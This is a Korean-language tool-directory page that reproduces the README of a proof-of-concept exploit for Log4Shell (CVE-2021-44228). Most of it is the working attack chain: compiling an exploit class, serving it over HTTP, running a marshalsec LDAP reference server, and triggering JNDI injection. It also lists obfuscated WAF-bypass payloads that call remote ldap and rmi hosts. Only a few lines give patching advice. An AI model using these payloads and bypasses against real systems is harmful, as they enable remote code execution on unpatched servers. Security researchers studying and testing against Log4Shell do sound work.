Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228 — Log4Shell(CVE-2021-44228)에 대한 개념 증명 익스플로잇으로, JNDI 주입을 통한 원격 코드 실행을 시연하며, 페이로드 컴파일, LDAP 서버 설정, WAF 우회 기법을 포함합니다. | Kitploit
도구/GitHubGitHub/maximofernandezriera/cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubmaximofernandezriera/cve-2021-44228

CVE-2021-44228

Log4Shell(CVE-2021-44228)에 대한 개념 증명 익스플로잇으로, JNDI 주입을 통한 원격 코드 실행을 시연하며, 페이로드 컴파일, LDAP 서버 설정, WAF 우회 기법을 포함합니다.

저장소 보기
51134년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-44228(Apache Log4j 원격 코드 실행)

모든 log4j-core 버전 >=2.0-beta9 및 <=2.14.1

1.x 버전에는 다른 취약점이 있으므로 최신 버전으로 업데이트할 것을 권장합니다.

Log4Shell(CVE-2021-44228)과 관련된 보안 권고/게시판

사용법:

이 프로젝트를 다운로드하고, 익스플로잇 코드 blob/master/src/main/java/Exploit.java를 컴파일한 후, 컴파일된 바이너리를 다운로드할 수 있게 하는 웹서버를 시작하세요.

git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce.git
cd CVE-2021-44228-Apache-Log4j-Rce

javac Exploit.java

# 웹서버 시작
# Python2용
python -m SimpleHTTPServer 8888
# Python3용
python3 -m http.server 8888

# python 웹서버가 Exploit.class와 같은 디렉토리에서 실행 중인지 확인하려면, 테스트
  curl -I 127.0.0.1:8888/Exploit.class

다른 프로젝트를 다운로드하고 JNDI 참조를 반환하는 LDAP 서버 구현을 실행하세요. https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 필요
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

활성화 코드를 빌드하고 실행하면(취약한 Java 웹서버에서 log4j 공격을 시뮬레이션) blob/master/src/main/java/log4j.java, 계산기 앱이 나타날 것입니다.

cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# 다음을 기대합니다
# 1. 계산기 앱이 나타남
# 2. ldapserver 콘솔에서,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. webserver 콘솔에서,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -


팁:

현재 Java 버전이 당신을 구해줄 것이라고 믿지 마세요. Log4(또는 JNDI 조회)를 업데이트하세요. 확장을 비활성화하세요(어쨌든 좋지 않은 생각으로 보입니다).

rc1 우회

예시:

${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF 우회

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

웹 애플리케이션 방화벽을 신뢰하지 마세요.

취약점 세부 정보

Lookups는 Log4j 구성의 임의 위치에 값을 추가하는 방법을 제공합니다.

Lookups

finally에서 누출을 유발하는 메서드

LogManager.getLogger().error()
LogManager.getLogger().fatal()

간단한 확인 방법

블랙박스 테스트를 하고 싶다면, 수동 스캔을 권장합니다.

BurpLog4jScan

즐거운 시간 되세요!!! BurpLog4jScan.png

시간에 따른 Stargazers

Stargazers over time

도구 다운로드